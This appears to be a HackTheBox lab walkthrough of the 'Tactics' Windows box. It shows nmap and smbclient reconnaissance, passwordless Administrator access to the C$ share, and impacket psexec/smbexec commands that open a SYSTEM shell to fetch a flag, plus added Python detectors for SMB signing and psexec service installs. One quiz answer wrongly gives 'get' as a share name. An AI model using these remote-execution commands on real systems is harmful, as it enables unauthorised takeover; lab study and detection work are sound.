
Tactics (HackTheBox)

Target IP Address: 10.129.25.16

Recon

└──╼ []$ nmap -sC -sV -T4 --max-rate 5000 -vv -p- -oN initial_recon.txt 10.129.25.16

Result:

PORT    STATE SERVICE       REASON          VERSION
135/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 42293/tcp): CLEAN (Timeout)
|   Check 2 (port 15094/tcp): CLEAN (Timeout)
|   Check 3 (port 28697/udp): CLEAN (Timeout)
|   Check 4 (port 42482/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2026-04-12T05:44:40
|_  start_date: N/A
|_clock-skew: -1s

  1. Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall? Ans: -Pn
  2. What does the 3-letter acronym SMB stand for? Ans: Server Message Block
  3. What default port does SMB listen on? Ans: 445
  4. What command line argument do you give to smbclient to list available shares? Ans: -L
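The scan output above is worth parsing rather than eyeballing: the `smb2-security-mode` result ("Message signing enabled but not required") is the one hardening gap the scan exposes. The following parser is an added example, not part of the original writeup; the function names are mine, and `SAMPLE_SCAN` is a constructed copy of the scan excerpt so the block runs offline against the same text.

```python
"""Parse Nmap -oN output like the scan above and summarise the SMB signing posture.

Added example, not part of the original writeup. SAMPLE_SCAN is a constructed
copy of the scan excerpt; parse_ports, parse_host_scripts and
smb_signing_status are my own helper names.
"""
import re

# Constructed sample: the relevant lines of the scan output shown above.
SAMPLE_SCAN = """\
PORT    STATE SERVICE       REASON          VERSION
135/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-04-12T05:44:40
|_  start_date: N/A
|_clock-skew: -1s
"""

# One port line of -oN output; with -vv the REASON column carries "syn-ack ttl N".
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+(?:\s+ttl\s+\d+)?)\s*(?P<version>.*)$"
)


def parse_ports(text: str) -> list[dict]:
    """Return one dict per port line (port, proto, state, service, reason, version)."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            d = m.groupdict()
            d["port"] = int(d["port"])
            d["version"] = d["version"].strip()
            ports.append(d)
    return ports


def parse_host_scripts(text: str) -> dict[str, list[str]]:
    """Group NSE output: '| name:' starts a script, deeper-indented lines continue it,
    and '|_' just marks the last line of a script (so it is stripped, not parsed)."""
    scripts: dict[str, list[str]] = {}
    current = None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        body = line[1:]
        if body.startswith("_"):
            body = body[1:]
        indent = len(body) - len(body.lstrip(" "))
        stripped = body.strip()
        if indent <= 1:  # header line: '| script-name: optional value'
            name, _, rest = stripped.partition(":")
            current = name.strip()
            scripts[current] = [rest.strip()] if rest.strip() else []
        elif current is not None and stripped:
            scripts[current].append(stripped)
    return scripts


def smb_signing_status(scripts: dict[str, list[str]]) -> dict:
    """Summarise smb2-security-mode: negotiated dialect and whether signing is enforced."""
    status = {"dialect": None, "signing_required": None, "finding": None}
    for entry in scripts.get("smb2-security-mode", []):
        if re.fullmatch(r"\d+:\d+:\d+:?", entry):  # nmap prints dialect 3.1.1 as "3:1:1:"
            status["dialect"] = entry.rstrip(":").replace(":", ".")
        elif "signing" in entry.lower():
            msg = entry.lower()
            status["signing_required"] = "required" in msg and "not required" not in msg
            if not status["signing_required"]:
                status["finding"] = (
                    "SMB signing not enforced: set RequireSecuritySignature on the server"
                )
    return status


if __name__ == "__main__":
    for p in parse_ports(SAMPLE_SCAN):
        print(f"{p['port']}/{p['proto']} {p['state']} {p['service']} {p['version']}")
    print(smb_signing_status(parse_host_scripts(SAMPLE_SCAN)))
```

On the sample text the parser reports three open TCP ports and a dialect of 3.1.1 with signing not required, which is exactly the condition a defender would want surfaced from a fleet-wide scan rather than read off one host.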

Recon SMBClient

└──╼ []$ smbclient -L 10.129.25.16 -U Administrator
Password for [WORKGROUP\Administrator]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.25.16 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

  1. What character at the end of a share name indicates it’s an administrative share? Ans: $
  2. Which Administrative share is accessible on the box that allows users to view the whole file system? Ans: get
  3. What command can we use to download the files we find on the SMB Share? Ans: get

Foothold

Using SMB Client

Connecting to the C$ share with smbclient:

└──╼ []$ smbclient \\\\10.129.25.16\\C$ -U Administrator
Password for [WORKGROUP\Administrator]:

Try "help" to get a list of possible commands.

smb: \>

smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
  .                                  DR        0  Thu Apr 22 02:16:03 2021
  ..                                 DR        0  Thu Apr 22 02:16:03 2021
  desktop.ini                       AHS      282  Wed Apr 21 10:23:32 2021
  flag.txt                            A       32  Fri Apr 23 04:39:00 2021

...
smb: \Users\Administrator\Desktop\> get flag.txt

Using impacket

You can also use the Impacket tool collection to spawn a shell:

└──╼ []$ impacket-smbexec -shell-type powershell -no-pass Administrator@10.129.25.16
Impacket v0.13.0.dev0
...
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cd ~
[-] You can't CD under SMBEXEC. Use full paths.

Oops. Looks like I have the wrong impacket tool. We could use psexec instead:

└──╼ []$ impacket-psexec -no-pass Administrator@10.129.25.16
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.25.16.....
[*] Found writable share ADMIN$
[*] Uploading file IItHjMcz.exe
[*] Opening SVCManager on 10.129.25.16.....
[*] Creating service diSd on 10.129.25.16.....
[*] Starting service diSd.....
[!] Press help for extra shell commands

Using the spawned shell, we can look for flag.txt in C:\Users\Administrator\Desktop:

Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd \Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
...
 Directory of C:\Users\Administrator\Desktop

04/22/2021  12:16 AM    <DIR>          .
04/22/2021  12:16 AM    <DIR>          ..
04/23/2021  02:39 AM                32 flag.txt
               1 File(s)             32 bytes
               2 Dir(s)   4,746,768,384 bytes free
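The psexec output above shows what this kind of access leaves behind on the target: a randomly named executable uploaded to the root of ADMIN$ (IItHjMcz.exe) and a randomly named service (diSd) created to run it, which a Windows host records as a System log event 7045 ("A service was installed in the system"). The detection below is an added example, not part of the original writeup: the event records are constructed to mirror those artefacts, the field names are my own simplification of a 7045 event, and the helper names are mine.

```python
"""Flag psexec-style service installs in Windows System log events (ID 7045).

Added example, not part of the original writeup. SAMPLE_EVENTS is constructed
to mirror the artefacts in the psexec run above (binary IItHjMcz.exe dropped in
the ADMIN$ root, service diSd); looks_random and detect_psexec_installs are
my own helper names.
"""
import re

# Constructed sample events: one psexec-style install plus a benign baseline.
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "TACTICS", "service_name": "diSd",
     "image_path": r"%SystemRoot%\IItHjMcz.exe",
     "start_type": "demand start", "account": "LocalSystem"},
    {"event_id": 7045, "host": "TACTICS", "service_name": "gupdate",
     "image_path": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc',
     "start_type": "auto start", "account": "LocalSystem"},
    {"event_id": 7045, "host": "TACTICS", "service_name": "WpnUserService",
     "image_path": r"C:\Windows\System32\svchost.exe -k UnistackSvcGroup",
     "start_type": "auto start", "account": "LocalSystem"},
    # A 7036 state-change event for the same service is not an install; ignored.
    {"event_id": 7036, "host": "TACTICS", "service_name": "diSd",
     "image_path": "", "start_type": "", "account": ""},
]

# Binary sitting directly in the Windows root (the root of ADMIN$) with no
# sub-directory: "%SystemRoot%\X.exe" or "C:\Windows\X.exe", optional args.
ADMIN_ROOT_EXE = re.compile(
    r'^"?(?:%systemroot%|c:\\windows)\\([^\\"\s]+\.exe)"?(?:\s.*)?$', re.IGNORECASE
)


def case_transitions(name: str) -> int:
    """Count upper/lower flips between adjacent letters ('diSd' -> 2)."""
    return sum(
        1 for a, b in zip(name, name[1:])
        if a.isalpha() and b.isalpha() and a.isupper() != b.isupper()
    )


def looks_random(name: str) -> bool:
    """Random ASCII-letter names flip case mid-word; real names rarely do so twice."""
    return name.isascii() and name.isalpha() and case_transitions(name) >= 2


def detect_psexec_installs(events: list[dict]) -> list[dict]:
    """Return one alert per 7045 event whose binary was dropped in the ADMIN$ root
    and whose service name or binary name looks machine-generated."""
    alerts = []
    for ev in events:
        if ev.get("event_id") != 7045:
            continue
        m = ADMIN_ROOT_EXE.match(ev["image_path"])
        if not m:
            continue
        exe = m.group(1)
        reasons = ["service binary placed directly in the Windows root (ADMIN$ root)"]
        if looks_random(exe[:-4]):
            reasons.append(f"random-looking binary name {exe}")
        if looks_random(ev["service_name"]):
            reasons.append(f"random-looking service name {ev['service_name']}")
        if len(reasons) > 1:  # location alone is weak; require a second signal
            alerts.append({"host": ev["host"], "service_name": ev["service_name"],
                           "image_path": ev["image_path"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_psexec_installs(SAMPLE_EVENTS):
        print(f"[!] {alert['host']}: service {alert['service_name']} -> {alert['image_path']}")
        for reason in alert["reasons"]:
            print(f"    - {reason}")
```

The location check does the heavy lifting: legitimate services live under Program Files or System32, not loose in the Windows root, so the name heuristic only has to separate the remaining handful of candidates. Pairing this with the share-access events for ADMIN$ (the upload step in the output above) would give the same alert a second, independent source.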
Author
Royce Chua
Career changer with a background in physics and medicine, now working toward systems administration and network engineering. ISC2 Certified in Cybersecurity (CC), with Cisco CCNA studies in progress.